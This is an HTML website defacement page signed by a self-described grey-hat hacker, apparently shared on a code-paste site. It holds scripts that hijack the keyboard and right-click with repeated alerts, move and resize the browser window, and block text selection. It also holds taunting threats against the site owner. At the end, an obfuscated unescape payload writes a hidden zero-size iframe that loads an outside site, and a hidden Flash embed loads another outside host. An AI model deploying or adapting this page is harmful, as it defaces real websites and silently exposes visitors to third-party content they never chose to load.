Hacked
4 years ago in HTML
<html>
<head>
<title>--==[[ Hacked by Asif Shariar !! ]]==--</title>
<script>alert("Hacked by Asif Shariar! Click Ok to learn more..")</script>
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function (&quot;return false&quot;)
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<script>
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("Hacked by Asif Shariar! Click Ok to learn more..");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('Hacked by Asif Shariar! Click Ok to learn more..');
}
</script>
<script language="javascript" type="text/javascript">
<!--
var text='i Love you ... =)';
var delay = 40; // SPEED OF TRAIL
var Xoff = 0; // PIXEL COUNT FROM THE LEFT OF THE
CURSOR (- VALUES GO TO LEFT)
var Yoff = -30; // PIXEL COUNT FROM THE TOP OF THE
CURSOR (- VALUES GO UP)
var txtw = 14; // AMOUNT OF PIXEL SPACE EACH
CHARACTER OCCUPIES
var beghtml = '<font color="#FF0000"><b>'; // OPTIONAL HTML CODE
THAT EFFECTS WHOLE TEXT STRING SUCH AS FONT COLOR, SIZE, ETC.
var endhtml = '<\/b><\/font>'; // END HTML CODE. MOSTLY USED IF
ABOVE SETTING IS USED.
ns4 = (navigator.appName.indexOf("Netscape")>=0 && document.layers)?
true : false;
ie4 = (document.all && !document.getElementById)? true : false;
ie5 = (document.all && document.getElementById)? true : false;
ns6 = (document.getElementById && navigator.appName.indexOf
("Netscape")>=0 )? true: false;
var txtA = new Array();
text=text.split('');
var x1=0;
var y1=-1000;
var t='';
for(i=1; i <= text.length; i++) {
t+=(ns4)? '<layer name="txt'+i+'" top="-100" left="0"
width="'+txtw+'" height="1">' : '<div id="txt'+i+'" style="position:absolute;
top:-100px; left:0px; height:1px; width:'+txtw+'; visibility:visible;">';
t+=beghtml+text[i-1]+endhtml;
t+=(ns4)? '<\/layer>' : '<\/div>';
}
document.write(t);
function moveid(id,x,y) {
if(ns4) {
id.moveTo(x,y);
}else{
id.style.left=x+'px';
id.style.top=y+'px';
}
}
function animate(evt) {
x1=Xoff+((ie4||ie5)?
event.clientX+document.body.scrollLeft:evt.pageX);
y1=Yoff+((ie4||ie5)?
event.clientY+document.body.scrollTop:evt.pageY);
}
function getidleft(id) {
if(ns4)
return id.left;
else
return parseInt(id.style.left);
}
function getidtop(id) {
if(ns4)
return id.top;
else
return parseInt(id.style.top);
}
function getwindowwidth() {
if(ie4||ie5)
return
document.body.clientWidth+document.body.scrollLeft;
else
return window.innerWidth+pageXOffset;
}
function movetxts() {
for(i=text.length;i>1;i=i-1) {
if(getidleft(txtA[i-1])+txtw*2>=getwindowwidth()) {
moveid(txtA[i-1],0,-1000);
moveid(txtA[i],0,-1000);
}else
moveid(txtA[i], getidleft(txtA[i-1])+txtw,
getidtop(txtA[i-1]));
}
moveid(txtA[1],x1,y1);
}
window.onload=function() {
for(i=1;i<=text.length;i++)
txtA[i]=(ns4)?document.layers['txt'+i]:(ie4)?
document.all['txt'+i]:document.getElementById('txt'+i);
if(ns4)
document.captureEvents
(Event.MOUSEMOVE);
document.onmousemove=animate;
setInterval('movetxts()',delay);
}
-->
</script>
<SCRIPT>
window.scrollBy(0, 1)
window.resizeTo(0,0)
window.moveTo(0,0)
//setInterval("move()",30);
setTimeout("move()", 1);
var mxm=50
var mym=25
var mx=0
var my=0
var sv=50
var status=1
var szx=0
var szy=0
var c=255
var n=0
var sm=30
var cycle=2
var done=2
function move()
{
if (status == 1)
{
mxm=mxm/1.05
mym=mym/1.05
mx=mx+mxm
my=my-mym
mxm=mxm+(400-mx)/100
mym=mym-(300-my)/100
window.moveTo(mx,my)
rmxm=Math.round(mxm/10)
rmym=Math.round(mym/10)
if (rmxm == 0)
{
if (rmym == 0)
{
status=2
}
}
}
if (status == 2)
{
sv=sv/1.1
scrratio=1+1/3
mx=mx-sv*scrratio/2
my=my-sv/2
szx=szx+sv*scrratio
szy=szy+sv
window.moveTo(mx,my)
window.resizeTo(szx,szy)
if (sv < 0.1)
{
status=3
}
}
if (status == 3)
{
document.fgColor=0xffffFF
c=c-16
if (c<0)
{status=8}
}
if (status == 4)
{
c=c+16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 239)
{status=5}
}
if (status == 5)
{
c=c-16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c < 0)
{
status=6
cycle=cycle-1
if (cycle > 0)
{
if (done == 1)
{status=7}
else
{status=4}
}
}
}
if (status == 6)
{
document.title = "Cljck"
alert("Cljck")
cycle=2
status=4
done=1
}
if (status == 7)
{
c=c+4
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 128)
{status=8}
}
if (status == 8)
{
window.moveTo(0,0)
sx=screen.availWidth
sy=screen.availHeight
window.resizeTo(sx,sy)
status=9
}
var timer=setTimeout("move()",0.3)
}
</SCRIPT> <style type="text/css">
<!--
body,td,th {
color: #CCCCCC;
}
body {
background-color: #000000;
}
.style26 {
font-size: 50px;
color: #FF0000;
}
.style36 {color: #999999}
.style37 {
color: #00FF00;
font-family: Georgia, "Times New Roman", Times, serif;
}
.style38 {
color: #00FF00;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 36px;
}
.style39 {
color: #FF0000;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 18px;
}
.style40 {
color: #00FF00;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 18px;
}
.style41 {
color: #CCCCCC;
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 12px;
}
-->
</style>
</head>
<body bgcolor="#000000" spellcheck="false">
<div><font color="#00ff00"> </font>
<link REL="SHORTCUT ICON"
HREF="http://i55.tinypic.com/2z7ld11.gif"></head>
<body
background="http://m.pimpmyspace.org/pimp/1/2d/2de4890370a9f599fd7a.
gif" bgcolor="#000000">
<center>
<font color="Green"><b><big><big><big><big><blink>You just Hacked by AH !!
</font> </span> <br> </font> <img
src="http://lh3.ggpht.com/rosangala.moreira/SDOJyMNL0yI/AAAAAAAAAlY/
1nQWHr4PReA/s400/a01.png" border="0" height="120"
width="100"></b></span></font></span> <font color="green"> .:: I am Asif Shariar a Grey Hat hacker! =) ::. </font> <img
src="http://lh3.ggpht.com/rosangala.moreira/SDOJyMNL0yI/AAAAAAAAAlY/
1nQWHr4PReA/s400/a01.png" border="0" height="120"
width="100"></b></span></font></span></blink></big></big></big></big></b
></font></center>
<center>
<img border="0" src="
http://lh3.ggpht.com/_EUVla-
utiuY/S2rTEhmiNAI/AAAAAAAABNU/iBFljtI4p3g/s400/236%5B1%5D.png"
></P>
<br>
<p style="font-family:vendara;font-size:35px;color:red">
Sweetheart ,
If You go against me you will get hacked again and again.<br>
I hacked your laptop,Mobile, Wifi network & now Your website!
</p>
<p style="font-family:vendara;font-size:30px;color:green">
<br>
Don't make me more angry I'm agnry bird & hacker
you cant't beat me kid.
Look at my face carefully!!
You can't forget my face ever after this mastermind hacking by me
<br>
<b><img
src="https://scontent.fdac99-1.fna.fbcdn.net/v/t1.0-9/71970387_134702051261356_2760497793217855488_o.jpg?_nc_cat=111&ccb=2&_nc_sid=174925&_nc_eui2=AeHcIc_OtnRSrHLAdYgt9pL6GOs-qWC9ResY6z6pYL1F66GDnRzWCGvBB_B1d7TsceJpEUH07ixgLFw6C3ZXpRoo&_nc_ohc=07ssJIslTcoAX-0m7d7&_nc_ht=scontent.fdac99-1.fna&oh=bf53fbc6186f9366d340d79765839312&oe=5FE21489" border="0" height="163"
width="263"></b></span></font></span><font color="whitesmoke"
face="impact" size="5"> <font color="whitesmoke" face="impact"
size="5">&nbsp;&nbsp;&nbsp;</font><font color="green" face="impact"
size="7">***</font><font color="green" face="impact" size="7"> </font>
<font color="green" face="impact" size="7"> </font><font color="green"
face="impact" size="7"> </font>
<font color="green" face="impact" size="7"><span lang="en-
us">***</span></font><font color="green" face="impact" size="5">
&nbsp;&nbsp;</font><span style=""><font color="#00ff00" face="Tempus
Sans ITC" size="6"><span style=""><b><img
src="https://scontent.fdac99-1.fna.fbcdn.net/v/t1.0-9/115970537_339817300749829_898605161465209298_o.jpg?_nc_cat=104&ccb=2&_nc_sid=09cbfe&_nc_eui2=AeEu43NbN4YtoHKJKTCI8q6AgOY6h1gOy-2A5jqHWA7L7aZ1QrOlvr6VMda6YHpU0X00wOR71jhnGCl0-xZUqgqq&_nc_ohc=9hfN7lIE4v4AX99P2x_&_nc_ht=scontent.fdac99-1.fna&oh=e6f239c884d3def30cde614e6287cb4b&oe=5FE0E9CF" border="0" height="163"
width="216"></b></span></font></span><font color="green" face="impact"
size="5"><br>
<fONT COLOR="WHITE">With this letter, I just want to
convey to you that if we are
linked together, I'll provide you
all objects & libraries necessary
for a human being to live an
error free life.
I anticipate that nobody has
already logged in to your
database so that my connect
script will fail.
And its all but certain that if
this happened to me, my system
will crash beyond recovery.
Kindly interpret this letter
properly and grant me all
privileges of your inbox. Error
free.. </font>
<p align="center"><b><font color="#ffffff" face="Comic Sans MS" size="6">
</font></b></p>
<br>
<br>
<center><p><font face="Courier New"><font style="font-size: 17pt"
color="#FF0000">Regards,</font><font color="#FF0000" style="font-size:
17pt">
<font style="font-size: 17pt" color="#FF0000" face="Courier New">
My enemy<font style="font-size: 17pt" color="#FF0000"> <font
style="font-size: 17pt" color="#FF0000">
Today You got hacked !
Tomorrow your father , mother will be get hacker by AH.
Take Love. Have a good day!
</font></P>
</font>
<br><Br>
</center>
</head>
<style type="text/css">#cot_tl_fixed{background-
color:green;position:fixed;bottom:0px;font-size:20px;left:0px;padding:3px
0;clip:_top:expression
(document.documentElement.scrollTop+document.documentElement.clien
tHeight-this.clientHeight);_left:expression
(document.documentElement.scrollLeft +
document.documentElement.clientWidth - offsetWidth);}</style>
<span style="color: #FFFFFF;">
<body>
<object width="0" height="0"><param name="movie"
value="http://fsh.chirkutonorkut.com/albums/HI/ajab10.swf"></param><par
am name="allowFullScreen" value="true"></param><param
name="allowscriptaccess" value="always"></param><embed
src="http://fsh.chirkutonorkut.com/albums/HI/ajab10.swf" width="0"
height="0"></embed></object><script>
<!--
document.write(unescape("%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E"));
//-->
</script>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583